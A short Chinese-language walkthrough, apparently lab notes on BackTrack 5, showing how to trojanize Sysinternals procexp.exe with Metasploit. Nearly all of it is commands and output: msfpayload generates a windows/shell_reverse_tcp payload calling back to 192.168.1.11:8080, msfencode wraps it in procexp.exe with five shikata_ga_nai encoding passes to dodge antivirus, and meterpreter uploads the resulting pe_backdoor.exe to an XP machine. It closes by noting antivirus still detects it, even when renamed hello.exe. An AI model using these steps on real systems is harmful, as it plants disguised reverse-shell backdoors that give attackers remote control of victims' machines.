metasploit自定义可执行文件模板

在网上下载Sysinternals，解压，得到procexp.exe，把它传到BT5上去，然后生成pe_backdoor.exe

root@bt:/opt/metasploit/msf3# mkdir work
root@bt:/opt/metasploit/msf3# cp ~/procexp.exe work/
root@bt:/opt/metasploit/msf3# ls work/
procexp.exe
root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=8080 R | msfencode -t exe -x work/procexp.exe -o pe_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)


real    0m40.713s
user    0m24.734s
sys     0m15.513s
root@bt:/opt/metasploit/msf3# ls
armitage  documentation  HACKING  msfbinscan  msfd        msfgui       msfpescan  msfrpcd    pe_backdoor.exe  scripts  THIRD-PARTY.md
COPYING   external       lib      msfcli      msfelfscan  msfmachscan  msfrop     msfupdate  plugins          spec     tools
data      Gemfile        modules  msfconsole  msfencode   msfpayload   msfrpc     msfvenom   README.md        test     work
root@bt:/opt/metasploit/msf3# file pe_backdoor.exe 
pe_backdoor.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:/opt/metasploit/msf3# mv pe_backdoor.exe ~/

上传到XP：

meterpreter > upload pe_backdoor.exe
[*] uploading  : pe_backdoor.exe -> pe_backdoor.exe
[*] uploaded   : pe_backdoor.exe -> pe_backdoor.exe
meterpreter >

杀毒软件报告威胁，文件名改为hello.exe，也报告威胁。